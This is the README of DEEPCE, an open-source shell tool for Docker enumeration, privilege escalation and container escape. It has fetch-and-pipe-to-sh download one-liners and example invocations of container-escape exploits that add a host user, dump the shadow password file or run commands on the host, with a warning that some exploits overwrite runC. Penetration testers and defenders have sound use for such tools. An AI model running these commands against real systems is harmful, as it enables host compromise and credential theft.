


                      ##         .
                ## ## ##        ==
             ## ## ## ##       ===
         /"""""""""""""""""\___/ ===
    ~~~ {~~ ~~~~ ~~~ ~~~~ ~~~ ~ /  ===- ~~~
         \______ X           __/
           \    \         __/
     ____/ /__  ___  ____  ________ 
    / __  / _ \/ _ \/ __ \/ ___/ _ \   ENUMERATE
   / /_/ /  __/  __/ /_/ / (__/  __/  ESCALATE
   \__,_/\___/\___/ .___/\___/\___/  ESCAPE

ShellCheck ContainerTests <a href="https://www.buymeacoffee.com/stealthcopter"><img src="https://cdn.buymeacoffee.com/buttons/v2/arial-yellow.png" height="20px"></a>



Docker Enumeration, Escalation of Privileges and Container Escapes (DEEPCE)

In order for it to be compatible with the maximum number of containers DEEPCE is written in pure sh with no dependencies. It will make use of additional tools such as curl, nmap, nslookup and dig if available but for the most part is not reliant upon them for enumeration.

None of the enumeration should touch the disk, however most of the exploits create new containers which will cause disk writes, and some exploits will overwrite runC which can be destructive, so be careful!

Please see below for a list of the enumerations, exploits and payloads DEEPCE can use. If you have ideas for anymore please submit an issue in github!


DEEPCE can be downloaded onto a host or container using one of the following one-liners. Tip: download to /dev/shm to avoid touching the disk.

wget https://github.com/stealthcopter/deepce/raw/main/deepce.sh
curl -sL https://github.com/stealthcopter/deepce/raw/main/deepce.sh -o deepce.sh
# Or using python requests
python -c 'import requests;print(requests.get("https://github.com/stealthcopter/deepce/raw/main/deepce.sh").content)' > deepce.sh 
python3 -c 'import requests;print(requests.get("https://github.com/stealthcopter/deepce/raw/main/deepce.sh").content.decode("utf-8"))' > deepce.sh  


If you love what I'm doing with Deepce and my other projects, you can now support my work directly! By buying me a coffee ☕, you're not just fueling my caffeine needs – you're helping me dedicate more time to developing and improving these open source projects. Every coffee counts and brings more innovation to the cybersecurity world. Thank you for your support – it means the world to me and the open source community!

<a href="https://www.buymeacoffee.com/stealthcopter"><img src="https://cdn.buymeacoffee.com/buttons/v2/arial-yellow.png" height="50px"></a>


For more please view the docs folder screenshot1


The following is the list of enumerations performed by DEEPCE.



For each of the exploits above payloads can be defined in order to exploit the host system. These include:


# Make the script executable and then run it
chmod +x ./deepce.sh


The following examples show the different kinds of exploits that can be performed and the avaliable payloads.

./deepce.sh --no-enumeration --exploit PRIVILEGED --username deepce --password deepce
./deepce.sh --no-enumeration --exploit SOCK --shadow
./deepce.sh --no-enumeration --exploit DOCKER --command "whoami>/tmp/hacked"

Advanced Usage

It is possible to download and run deepce without touching the disk, however you will be unable to easily set arguments (direct manipulation of variables is possible using export).

wget -O - https://github.com/stealthcopter/deepce/raw/main/deepce.sh | sh
curl -sL https://github.com/stealthcopter/deepce/raw/main/deepce.sh | sh


There are some great container enumeration/escape scripts and enumeration tools that I've got inspiration from when writing this. However I felt the need to write one purely in sh in order to avoid having to install go / ruby dependencies or be reliant on a static binary. I also wanted to be able to perform more enumerations to try to discover what the docker container is as during as test we may end up inside an unknown container. The number of things this script can enumerate got away from me as every time I added something new I thought of more additional things I could add.


Developers looking for Docker security tips https://github.com/OWASP/CheatSheetSeries/blob/master/cheatsheets/Docker_Security_Cheat_Sheet.md


I welcome pull requests, issues and feedback.